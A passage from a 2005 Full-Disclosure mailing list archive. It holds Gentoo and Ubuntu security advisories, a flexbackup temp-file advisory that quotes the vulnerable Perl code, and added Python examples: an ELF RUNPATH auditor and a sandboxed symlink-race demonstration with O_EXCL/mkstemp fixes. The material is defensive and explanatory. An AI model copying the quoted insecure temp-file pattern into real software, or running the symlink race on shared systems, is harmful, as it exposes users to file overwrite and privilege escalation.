[Full-disclosure] [ GLSA 200510-14 ] Perl, Qt-UnixODBC, CMake: RUNPATH issues
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory            GLSA 200510-14
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
     Title: Perl, Qt-UnixODBC, CMake: RUNPATH issues
      Date: October 17, 2005
      Bugs: #105719, #105721, #106678
        ID: 200510-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple packages suffer from RUNPATH issues that may allow users in the
portage group to escalate privileges.

Background
==========

Perl is a stable, cross-platform programming language created by Larry
Wall. Qt-UnixODBC is an ODBC library for Qt. CMake is a cross-platform
build environment.

Affected packages
=================

    -------------------------------------------------------------------
     Package                 /  Vulnerable  /                Unaffected
    -------------------------------------------------------------------
  1  dev-lang/perl               < 5.8.7-r1                 >= 5.8.7-r1
                                                           *>= 5.8.6-r6
  2  dev-db/qt-unixodbc          < 3.3.4-r1                 >= 3.3.4-r1
  3  dev-util/cmake              < 2.2.0-r1                 >= 2.2.0-r1
                                                           *>= 2.0.6-r1
    -------------------------------------------------------------------
     3 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

Some packages may introduce insecure paths into the list of directories
that are searched for libraries at runtime. Furthermore, packages
depending on the MakeMaker Perl module for build configuration may have
incorrectly copied the LD_RUN_PATH into the DT_RPATH.

Impact
======

A local attacker, who is a member of the portage group, could create a
malicious shared object in the Portage temporary build directory that
would be loaded at runtime by a dependent executable, potentially
resulting in privilege escalation.

Workaround
==========

Only grant portage group rights to trusted users.

Resolution
==========

All Perl users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose dev-lang/perl

All Qt-UnixODBC users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose "=dev-db/qt-unixodbc-3.3.4-r1"

All CMake users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose dev-util/cmake

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200510-14.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

signature.asc
Description: OpenPGP digital signature

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
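The advisory names the defect (a DT_RPATH or DT_RUNPATH entry pointing into the Portage build tree) but not how to find it on an installed system. The following is an added example, not Gentoo's code or code from any of the affected packages: a Python script that walks an ELF64 program header table, reads DT_RPATH and DT_RUNPATH out of the dynamic section, and flags entries an unprivileged user could populate (empty entries, relative entries, and entries under a shared temporary directory). It assumes the Portage build directory is /var/tmp/portage, the PORTAGE_TMPDIR default. build_elf is constructed test input, a minimal image with only PT_LOAD and PT_DYNAMIC, so the check can be exercised offline; on a real box you would run the script over /usr/bin and /usr/lib, or ask pax-utils' scanelf -r the same question.

```python
import struct

# ELF constants (System V ABI) needed to walk the dynamic section
PT_LOAD, PT_DYNAMIC = 1, 2
DT_NULL, DT_STRTAB, DT_RPATH, DT_RUNPATH = 0, 5, 15, 29
EHDR = "<16sHHIQQQIHHHHHH"   # ELF64 little-endian file header
PHDR = "<IIQQQQQQ"           # ELF64 program header
DYN = "<qQ"                  # ELF64 dynamic entry (tag, value)

# Assumption: Portage builds under /var/tmp/portage (the PORTAGE_TMPDIR default)
UNTRUSTED_PREFIXES = ("/var/tmp/portage", "/var/tmp", "/tmp")


def dynamic_paths(data):
    """Return {"DT_RPATH": [...], "DT_RUNPATH": [...]} found in an ELF64 LE image."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("only ELF64 little-endian images are handled here")
    hdr = struct.unpack_from(EHDR, data, 0)
    e_phoff, e_phentsize, e_phnum = hdr[5], hdr[9], hdr[10]
    loads, dyn = [], None
    for i in range(e_phnum):
        p_type, _, p_offset, p_vaddr, _, p_filesz, _, _ = struct.unpack_from(
            PHDR, data, e_phoff + i * e_phentsize)
        if p_type == PT_LOAD:
            loads.append((p_vaddr, p_offset, p_filesz))
        elif p_type == PT_DYNAMIC:
            dyn = (p_offset, p_filesz)
    if dyn is None:
        return {}   # no dynamic section: nothing is searched at run time
    entries = []
    for pos in range(dyn[0], dyn[0] + dyn[1], struct.calcsize(DYN)):
        tag, val = struct.unpack_from(DYN, data, pos)
        if tag == DT_NULL:
            break
        entries.append((tag, val))
    # DT_STRTAB holds a virtual address; map it to a file offset through PT_LOAD
    strtab_va = next(v for t, v in entries if t == DT_STRTAB)
    strtab_off = next(off + (strtab_va - va)
                      for va, off, sz in loads if va <= strtab_va < va + sz)

    def cstr(idx):
        end = data.index(b"\0", strtab_off + idx)
        return data[strtab_off + idx:end].decode()

    names = {DT_RPATH: "DT_RPATH", DT_RUNPATH: "DT_RUNPATH"}
    found = {}
    for tag, val in entries:
        if tag in names:
            found.setdefault(names[tag], []).extend(cstr(val).split(":"))
    return found


def audit_search_paths(data, untrusted=UNTRUSTED_PREFIXES):
    """List (tag, entry, reason) for each search-path entry another user could control."""
    findings = []
    for tag, entries in dynamic_paths(data).items():
        for entry in entries:
            if entry == "":
                findings.append((tag, entry, "empty entry: the current directory is searched"))
            elif not entry.startswith(("/", "$ORIGIN", "${ORIGIN}")):
                findings.append((tag, entry, "relative path: resolved against the current directory"))
            elif any(entry == p or entry.startswith(p + "/") for p in untrusted):
                findings.append((tag, entry, "under a directory other users can write to"))
    return findings


def build_elf(rpath=None, runpath=None):
    """Constructed test input: a minimal ELF64 image with one PT_LOAD and one
    PT_DYNAMIC carrying DT_STRTAB plus the requested path tags. No code, not runnable."""
    base = 0x400000
    strtab, str_idx = b"\0", {}
    for tag, val in ((DT_RPATH, rpath), (DT_RUNPATH, runpath)):
        if val is not None:
            str_idx[tag] = len(strtab)
            strtab += val.encode() + b"\0"
    strtab_off = struct.calcsize(EHDR) + 2 * struct.calcsize(PHDR)
    dyn_off = (strtab_off + len(strtab) + 7) & ~7          # 8-byte align the dynamic array
    dyn = struct.pack(DYN, DT_STRTAB, base + strtab_off)
    dyn += b"".join(struct.pack(DYN, t, i) for t, i in str_idx.items())
    dyn += struct.pack(DYN, DT_NULL, 0)
    total = dyn_off + len(dyn)
    ident = b"\x7fELF\x02\x01\x01" + b"\0" * 9              # ELF64, little-endian, version 1
    ehdr = struct.pack(EHDR, ident, 2, 62, 1, base, struct.calcsize(EHDR), 0, 0,
                       struct.calcsize(EHDR), struct.calcsize(PHDR), 2, 64, 0, 0)
    load = struct.pack(PHDR, PT_LOAD, 5, 0, base, base, total, total, 0x1000)
    dynamic = struct.pack(PHDR, PT_DYNAMIC, 6, dyn_off, base + dyn_off, base + dyn_off,
                          len(dyn), len(dyn), 8)
    image = ehdr + load + dynamic + strtab
    return image + b"\0" * (dyn_off - len(image)) + dyn


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            for tag, entry, why in audit_search_paths(f.read()):
                print(f"{path}: {tag} {entry!r}: {why}")
```

The check deliberately treats DT_RPATH and DT_RUNPATH the same way: the distinction (DT_RUNPATH is consulted after LD_LIBRARY_PATH, DT_RPATH before it) changes search order, not whether a world-writable directory on the list is exploitable. A $ORIGIN entry is accepted here, which is fine for binaries installed into root-owned directories and not for anything that lives in a user-writable tree.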
[Full-disclosure] flexbackup default config insecure temporary file creation
# flexbackup default config insecure temporary file creation

Vendor: http://flexbackup.sourceforge.net/
Advisory: http://www.zataz.net/adviso/flexbackup-09192005.txt
Vendor informed: yes
Exploit available: yes
Impact: low
Exploitation: low

The vulnerabilities are due to insecure temporary file creation caused by the default config. They allow symlink attacks to create arbitrary files with the privileges of the user running the affected script, disclosure of sensitive information, and possibly local or remote arbitrary command execution.

## Versions:

flexbackup <= 1.2.1

## Solution:

Change the default config $tmpdir

# Timeline:

Discovered: 2005-09-06
Vendor notified: 2005-09-19
Vendor response: none
Vendor fix: none
Vendor Sec report ([EMAIL PROTECTED]): 2005-09-30
Disclosure: 2005-10-15

# Technical details:

Vulnerable code:

* In /etc/flexbackup.conf:

    $tmpdir = '/tmp';

* In flexbackup:

    checkvar(\$cfg::tmpdir,'tmpdir','exist','/tmp');

If tmpdir is not defined, /tmp is used by default; but here the config file already sets tmpdir to /tmp by default.

5229     my $tmp_script = "$cfg::tmpdir/buftest.$host.$PROCESS_ID.sh";

5236     # Create a script which tests the buffer program
5237     open(SCR, ">$tmp_script") || die;
5238     print SCR "#!/bin/sh\n";
5239     print SCR "tmp_data=/tmp/bufftest\$\$.txt\n";
5240     print SCR "tmp_err=/tmp/bufftest\$\$.err\n";
5241     print SCR "echo testme > \$tmp_data\n";
5242     print SCR "$buffer_cmd > /dev/null 2> \$tmp_err < \$tmp_data\n";
5243     print SCR "res=\$?\n";
5244     print SCR "out=\`cat \$tmp_err\`\n";
5245     print SCR "if [ \$res -eq 0 ]; then\n";
5246     print SCR "  echo successful\n";
5247     print SCR "else\n";
5248     print SCR "  echo \"unsuccessful: exit code \$res: \$out\" \n";
5249     print SCR "fi\n";
5250     print SCR "rm -f \$tmp_data \$tmp_err\n";
5251     close(SCR);

Here we have a possible symlink attack (race condition), and also the possibility of placing an untrusted script at tmp_script (race condition). The script that is created is itself also vulnerable to a possible symlink attack (race condition): it writes to fixed names under /tmp.

5253     if ($host eq 'localhost') {
5254         print $::msg "| Checking '$cfg::buffer' on this machine... ";
5255         $pipecmd = "sh $tmp_script";
5256     } else {
5257         print $::msg "| Checking '$cfg::buffer' on host $host... ";
5258         $pipecmd = "cat $tmp_script | ($::remoteshell $host 'cat > $tmp_script; sh $tmp_script; rm -f $tmp_script')";

We see here that the untrusted script could be executed on localhost or on a remote host.

5446     my $tmp1 = "$cfg::tmpdir/test1.$PROCESS_ID";
5447     my $tmp2 = "$cfg::tmpdir/test2.$PROCESS_ID";
5448     my $tmp3 = "$cfg::tmpdir/test3.$PROCESS_ID";

Here $cfg::pad_blocks must be false to exploit the possible symlink attack (race condition). By default pad_blocks is true in the config file, so there is no risk if the configuration was not modified.

359      if (defined($::pkgdelta)) {
360          if (defined($::local)) {
361              list_packages('localhost');
362              find_packaged_files('localhost');
363              find_changed_files('localhost');
364          }
365          foreach my $host (keys %::remotehosts) {
366              list_packages($host);
367              find_packaged_files($host);
368              find_changed_files($host);
369          }
370          $::pkgdelta_filelist = "$cfg::tmpdir/pkgdelta.$PROCESS_ID";
371          line();
372      }

Here we have a possible symlink attack (race condition).

619      my $exitscript = "$cfg::tmpdir/collectexit.$PROCESS_ID.sh";
620      my $result = "$cfg::tmpdir/exitstatus.$PROCESS_ID";

841          unlink($result);
842          open(SCR, ">$exitscript") || die;
843          print SCR '#!/bin/sh' . "\n";
844          print SCR '"$@"' . "\n";
845          print SCR '[ $? = 0 ] || echo "$@" > ' . $result . "\n";
846          close(SCR);
847          chmod(0755, $exitscript);
848
849          push(@cmds, "[ ! -e $result ]");
850      }

This one is more difficult to race.

# Related:

Bug report: http://bugs.gentoo.org/show_bug.cgi?id=105000
CVE: CAN-2005-2965

# Credits:

Eric Romang ([EMAIL PROTECTED] - ZATAZ Audit) - Gentoo Security Scout
Thanks to the Gentoo Security Team.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
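What makes the pattern above exploitable is the combination of a guessable name ($cfg::tmpdir/buftest.$host.$PID.sh), a shared directory, and an open() that truncates whatever is already at that path, symlink included. The following is an added example, not flexbackup's code and not the vendor's fix: Python that plays both sides of the race in a scratch directory, writes the script the way flexbackup does, then shows the two standard repairs, O_CREAT|O_EXCL (with O_NOFOLLOW) on a fixed name, and mkstemp for an unpredictable one. The victim file, the PID and the script body are all constructed for the demonstration; the same class of bug is what USN-208-1 reports for graphviz's dotty further down this page.

```python
import os
import tempfile


def write_script_flexbackup_style(tmpdir, host, pid, body):
    """The vulnerable pattern from the advisory: a predictable name in a shared
    tmpdir, written with a plain truncating open, which follows a planted symlink."""
    path = os.path.join(tmpdir, f"buftest.{host}.{pid}.sh")
    with open(path, "w") as f:
        f.write(body)
    return path


def write_script_fixed_name(path, body):
    """Hardened variant when the name must stay fixed: O_CREAT|O_EXCL fails with
    EEXIST if anything (a symlink included) is already at `path`, O_NOFOLLOW
    refuses symlinks outright, and mode 0600 keeps other users out of the file."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(body)
    return path


def write_script_private(body, tmpdir=None):
    """Preferred variant: mkstemp creates an unpredictable name atomically
    (O_CREAT|O_EXCL, mode 0600). For flexbackup, tmpdir should additionally be a
    directory only the backup user can write to, which is the advisory's fix."""
    fd, path = tempfile.mkstemp(prefix="buftest.", suffix=".sh", dir=tmpdir)
    with os.fdopen(fd, "w") as f:
        f.write(body)
    return path


def demo():
    """Runs the race in a throwaway directory; every input here is constructed."""
    with tempfile.TemporaryDirectory() as shared_tmp:
        # A file owned by the user who will run flexbackup; the attacker wants it overwritten.
        victim = os.path.join(shared_tmp, "victim")
        with open(victim, "w") as f:
            f.write("original\n")
        pid = 4242                                   # the attacker guesses or watches the PID
        predicted = os.path.join(shared_tmp, f"buftest.localhost.{pid}.sh")
        os.symlink(victim, predicted)                # planted before flexbackup writes the script

        # O_EXCL refuses to create through the planted symlink
        try:
            write_script_fixed_name(predicted, "#!/bin/sh\n")
            excl_refused = False
        except FileExistsError:
            excl_refused = True

        # mkstemp picks a fresh name, so the symlink is never touched
        private = write_script_private("#!/bin/sh\n", tmpdir=shared_tmp)
        with open(victim) as f:
            private_untouched = private != predicted and f.read() == "original\n"
        os.unlink(private)

        # the original pattern writes straight through the symlink into the victim
        write_script_flexbackup_style(shared_tmp, "localhost", pid, "#!/bin/sh\necho owned\n")
        with open(victim) as f:
            victim_after = f.read()
        return {"excl_refused": excl_refused,
                "private_untouched": private_untouched,
                "victim_after": victim_after}


if __name__ == "__main__":
    print(demo())
```

Note that the generated script in flexbackup also writes to fixed names (/tmp/bufftest$$.txt and .err) from the shell, so fixing the Perl side alone is not enough; the shell side needs mktemp(1) or a private directory for the same reason.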
[Full-disclosure] [USN-206-1] Lynx vulnerability
===========================================================
Ubuntu Security Notice USN-206-1           October 17, 2005
lynx vulnerability
CAN-2005-3120
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

lynx

The problem can be corrected by upgrading the affected package to
version 2.8.5-1ubuntu1.1 (for Ubuntu 4.10), 2.8.5-2ubuntu0.5.04 (for
Ubuntu 5.04), or 2.8.5-2ubuntu0.5.10 (for Ubuntu 5.10). In general, a
standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Ulf Harnhammar discovered a remote vulnerability in Lynx when
connecting to a news server (NNTP). The function that added missing
escape characters to article headers did not check the size of the
target buffer. Specially crafted news entries could trigger a buffer
overflow, which could be exploited to execute arbitrary code with the
privileges of the user running lynx.

In order to exploit this, the user is not even required to actively
visit a news site with Lynx since a malicious HTML page could
automatically redirect to an nntp:// URL with malicious news items.
Updated packages for Ubuntu 4.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1.diff.gz Size/MD5:17668 c5251ad9cead60e416cf21a461371877 http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1.dsc Size/MD5: 620 4b4310912f7f76fe01cf8312707be244 http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz Size/MD5: 2984352 5f516a10596bd52c677f9bfd9579bc28 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1_amd64.deb Size/MD5: 1882872 8be361fa3eead1e76cbbf2426c255c8b i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1_i386.deb Size/MD5: 1833368 d481856973186dd5d432e1102c49a917 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1_powerpc.deb Size/MD5: 1878484 1496a6331a4666295bd89703e509037a Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04.diff.gz Size/MD5:18015 6171994c6c8f67d84267aa69d00ba292 http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04.dsc Size/MD5: 626 08ff9f5a955222f051e4e78101ef7c40 http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz Size/MD5: 2984352 5f516a10596bd52c677f9bfd9579bc28 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04_amd64.deb Size/MD5: 1881886 74bc70c3731c903e69fd74eb0a6d2d68 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04_i386.deb Size/MD5: 1832038 f2e333289856566f93f19ca8fd0c5dfd powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04_powerpc.deb Size/MD5: 1878380 6440d4eae5fadef31aaf21c5396ef401 Updated packages for Ubuntu 
5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10.diff.gz Size/MD5:18015 0f7b6e508094dabd59bee9018b368523 http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10.dsc Size/MD5: 626 2a90195b05000a7f318eb04386d1ad1c http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz Size/MD5: 2984352 5f516a10596bd52c677f9bfd9579bc28 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10_amd64.deb Size/MD5: 1901120 c2e0da03f20b892aaea81d0f0588f7b1 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10_i386.deb Size/MD5: 1833214 7c021c0b0667d3aedc8479579d52e5ad powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10_powerpc.deb Size/MD5: 1881080 5ef72d193817f616e99f01113f6053dd signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-207-1] PHP vulnerability
===========================================================
Ubuntu Security Notice USN-207-1           October 17, 2005
php4 vulnerability
CAN-2005-3054
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)

The following packages are affected:

libapache-mod-php4
libapache2-mod-php4

The problem can be corrected by upgrading the affected package to
version 4:4.3.8-3ubuntu7.13 (for Ubuntu 4.10), or 4:4.3.10-10ubuntu4.2
(for Ubuntu 5.04). In general, a standard system upgrade is sufficient
to effect the necessary changes.

Details follow:

A bug has been found in the handling of the open_basedir directive.
Contrary to the specification, the value of open_basedir was handled
as a prefix instead of a proper directory name even if it was
terminated by a slash ('/'). For example, this allowed PHP scripts to
access the directory /home/user10 when open_basedir was configured to
'/home/user1/'.

Updated packages for Ubuntu 4.10:

  Source archives:
    http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.8-3ubuntu7.13.diff.gz
      Size/MD5:   620743 3b06c0da0313bc59be31ac77ead260bc
    http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.8-3ubuntu7.13.dsc
      Size/MD5:     1626 031af3bb3149f3f4e651a1582d9aee09
    http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.8.orig.tar.gz
      Size/MD5:  4832570 dd69f8c89281f088eadf4ade3dbd39ee

  Architecture independent packages:
    http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-dev_4.3.8-3ubuntu7.13_all.deb
      Size/MD5:   332792 ef203ed6e04985389038a2668e2b2bae
    http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-pear_4.3.8-3ubuntu7.13_all.deb
      Size/MD5:   334636 40cb1635e3ed9860d210cb5054e76332

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):
    http://security.ubuntu.com/ubuntu/pool/main/p/php4/libapache2-mod-php4_4.3.8-3ubuntu7.13_amd64.deb
      Size/MD5:  1689722 cdeaf5cd97840a91b346ff121e00e291
    http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-cgi_4.3.8-3ubuntu7.13_amd64.deb
      Size/MD5:  3198778 8cad2a9376b8483ab6873255274a258f
http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-curl_4.3.8-3ubuntu7.13_amd64.deb Size/MD5:17270 321f4676bd3c2bc286e1a726a93ab4c9 http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-domxml_4.3.8-3ubuntu7.13_amd64.deb Size/MD5:40434 e058a0198eafea4d8a322f84aa33bb6e http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-gd_4.3.8-3ubuntu7.13_amd64.deb Size/MD5:33612 ad726de3dfdbcacdcde3d90cdf851770 http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-ldap_4.3.8-3ubuntu7.13_amd64.deb Size/MD5:21236 2f0ab9a2891bbaf322c67e88b65f4c7a http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-mcal_4.3.8-3ubuntu7.13_amd64.deb Size/MD5:18406 f37ed15fb35f433726922d67d0463438 http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-mhash_4.3.8-3ubuntu7.13_amd64.deb Size/MD5: 7992 8b013d8ee95fb7563aaef62e9c05251e http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-mysql_4.3.8-3ubuntu7.13_amd64.deb Size/MD5:23108 7b3c7f8e89c97557498189719ef30ec0 http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-odbc_4.3.8-3ubuntu7.13_amd64.deb Size/MD5:28326 ad745d29d153db18995099efafdd3128 http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-recode_4.3.8-3ubuntu7.13_amd64.deb Size/MD5: 7618 aa19f54e0d7294cbf5cb1f8f976963f0 http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-snmp_4.3.8-3ubuntu7.13_amd64.deb Size/MD5:12970 3e592760088678bb91e3767762bc43f5 http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-sybase_4.3.8-3ubuntu7.13_amd64.deb Size/MD5:21512 a3190823cdb28c7d27da7a5f1f260569 http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-xslt_4.3.8-3ubuntu7.13_amd64.deb Size/MD5:17252 219742cd538690f92d24a82c074fba28 http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4_4.3.8-3ubuntu7.13_amd64.deb Size/MD5: 1705532 9f6543c2bad3f2a1eae0175ed4938c91 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/p/php4/libapache2-mod-php4_4.3.8-3ubuntu7.13_i386.deb Size/MD5: 1631536 
b533fecf692aa471bbdc7c2125ed1e3f http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-cgi_4.3.8-3ubuntu7.13_i386.deb Size/MD5: 3044892 60f5e35863ed1210762dd10cc245a8ff http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-curl_4.3.8-3ubuntu7.13_i386.deb Size/MD5:16852 fc06a8fc17ff7d820874ea9be1bcc93c http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-domxml_4.3.8-3ubuntu7.13_i386.deb Size/MD5:35556 c3b525c920b3d45c332e4ae90e5ba3d3
[Full-disclosure] [USN-208-1] graphviz vulnerability
===========================================================
Ubuntu Security Notice USN-208-1           October 17, 2005
graphviz vulnerability
CAN-2005-2965
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04 (Hoary Hedgehog)

The following packages are affected:

graphviz

The problem can be corrected by upgrading the affected package to
version 2.2-1ubuntu0.1. In general, a standard system upgrade is
sufficient to effect the necessary changes.

Details follow:

Javier Fernández-Sanguino Peña discovered that the dotty tool created
and used temporary files in an insecure way. A local attacker could
exploit this with a symlink attack to create or overwrite arbitrary
files with the privileges of the user running dotty.

  Source archives:
    http://security.ubuntu.com/ubuntu/pool/main/g/graphviz/graphviz_2.2-1ubuntu0.1.diff.gz
      Size/MD5:   207632 5e836a324f059215f8d0daaa9d469107
    http://security.ubuntu.com/ubuntu/pool/main/g/graphviz/graphviz_2.2-1ubuntu0.1.dsc
      Size/MD5:      788 7c934df6c6a84e937a7060d9743d1c29
    http://security.ubuntu.com/ubuntu/pool/main/g/graphviz/graphviz_2.2.orig.tar.gz
      Size/MD5:  4379295 9275d30695a5c22f360acbef7b85acd3

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):
    http://security.ubuntu.com/ubuntu/pool/universe/g/graphviz/graphviz-dev_2.2-1ubuntu0.1_amd64.deb
      Size/MD5:   147494 2b23526fde607848990ee8b931ea9e0e
    http://security.ubuntu.com/ubuntu/pool/universe/g/graphviz/graphviz-doc_2.2-1ubuntu0.1_amd64.deb
      Size/MD5:  1079078 846c09a610e9c7533c34be24ffd35524
    http://security.ubuntu.com/ubuntu/pool/main/g/graphviz/graphviz_2.2-1ubuntu0.1_amd64.deb
      Size/MD5:  1026506 9f08f1dba4f6e94320600d5c4d043d83

  i386 architecture (x86 compatible Intel/AMD):
    http://security.ubuntu.com/ubuntu/pool/universe/g/graphviz/graphviz-dev_2.2-1ubuntu0.1_i386.deb
      Size/MD5:   147500 beb9f9a7863864a0da2c829eb4688793
    http://security.ubuntu.com/ubuntu/pool/universe/g/graphviz/graphviz-doc_2.2-1ubuntu0.1_i386.deb
      Size/MD5:  1079084 58c7bd99908e4d61e946dd82b7000f12
http://security.ubuntu.com/ubuntu/pool/main/g/graphviz/graphviz_2.2-1ubuntu0.1_i386.deb Size/MD5: 947778 7e0fe2c149954e64cc6fdceaa5ae5bec powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/g/graphviz/graphviz-dev_2.2-1ubuntu0.1_powerpc.deb Size/MD5: 147508 2c786f652e59e9379e120d7065b5bca5 http://security.ubuntu.com/ubuntu/pool/universe/g/graphviz/graphviz-doc_2.2-1ubuntu0.1_powerpc.deb Size/MD5: 1079120 e20fb8adb1c98c784dd5016fda1df8d3 http://security.ubuntu.com/ubuntu/pool/main/g/graphviz/graphviz_2.2-1ubuntu0.1_powerpc.deb Size/MD5: 1075524 2d189fbb333fe89d00dd48a16dc27fc1 signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200510-16 ] phpMyAdmin: Local file inclusion vulnerability
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory            GLSA 200510-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: phpMyAdmin: Local file inclusion vulnerability
      Date: October 17, 2005
      Bugs: #108939
        ID: 200510-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

phpMyAdmin contains a local file inclusion vulnerability that may lead
to the execution of arbitrary code.

Background
==========

phpMyAdmin is a tool written in PHP intended to handle the
administration of MySQL over the web.

Affected packages
=================

    -------------------------------------------------------------------
     Package                 /  Vulnerable  /                Unaffected
    -------------------------------------------------------------------
  1  dev-db/phpmyadmin           < 2.6.4_p2                 >= 2.6.4_p2

Description
===========

Maksymilian Arciemowicz reported that in libraries/grab_globals.lib.php,
the $__redirect parameter was not correctly validated. Systems running
PHP in safe mode are not affected.

Impact
======

A local attacker may exploit this vulnerability by sending malicious
requests, causing the execution of arbitrary code with the rights of
the user running the web server.

Workaround
==========

Run PHP in safe mode.

Resolution
==========

All phpMyAdmin users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose "=dev-db/phpmyadmin-2.6.4_p2"

References
==========

  [ 1 ] PMASA-2005-4
        http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2005-4

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200510-16.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
